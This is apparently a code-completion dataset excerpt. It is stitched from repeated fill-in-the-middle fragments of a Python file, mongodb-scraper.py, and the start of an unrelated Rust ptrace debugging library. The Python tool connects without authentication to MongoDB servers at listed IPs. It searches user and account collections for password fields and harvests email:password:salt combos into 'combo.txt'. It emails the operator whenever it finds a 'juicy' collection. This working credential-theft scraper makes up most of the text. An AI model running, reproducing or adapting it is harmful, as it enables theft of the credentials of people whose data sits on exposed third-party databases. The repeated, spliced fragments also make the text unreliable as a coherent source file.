return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return | identifier_body |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def | (self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| scrape | identifier_name |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists |
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape() | if not os.path.exists('data'):
os.makedirs('data') | random_line_split |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
|
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested into?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resemble an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json) | conditional_block |
lib.rs | use bitflags::bitflags;
use std::{
fmt,
fs::{File, OpenOptions},
io::{self, prelude::*, Result, SeekFrom},
iter,
mem::{self, MaybeUninit},
ops::{Deref, DerefMut},
os::unix::{
fs::OpenOptionsExt,
io::AsRawFd,
},
ptr, slice,
};
mod arch;
mod kernel;
macro_rules! trace {
($($inner:expr),*) => {{
if cfg!(feature = "trace") {
dbg!($($inner),*)
} else {
($($inner),*)
}
}};
}
fn e<T>(res: syscall::Result<T>) -> Result<T> {
res.map_err(|err| io::Error::from_raw_os_error(err.errno))
}
bitflags! {
pub struct Flags: u64 {
const STOP_PRE_SYSCALL = syscall::PTRACE_STOP_PRE_SYSCALL.bits();
const STOP_POST_SYSCALL = syscall::PTRACE_STOP_POST_SYSCALL.bits();
const STOP_SINGLESTEP = syscall::PTRACE_STOP_SINGLESTEP.bits();
const STOP_SIGNAL = syscall::PTRACE_STOP_SIGNAL.bits();
const STOP_BREAKPOINT = syscall::PTRACE_STOP_BREAKPOINT.bits();
const STOP_EXIT = syscall::PTRACE_STOP_EXIT.bits();
const STOP_ALL = Self::STOP_PRE_SYSCALL.bits
| Self::STOP_POST_SYSCALL.bits | Self::STOP_SINGLESTEP.bits
| Self::STOP_SIGNAL.bits | Self::STOP_BREAKPOINT.bits
| Self::STOP_EXIT.bits;
const EVENT_CLONE = syscall::PTRACE_EVENT_CLONE.bits();
const EVENT_ALL = Self::EVENT_CLONE.bits;
const FLAG_IGNORE = syscall::PTRACE_FLAG_IGNORE.bits();
const FLAG_ALL = Self::FLAG_IGNORE.bits;
}
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
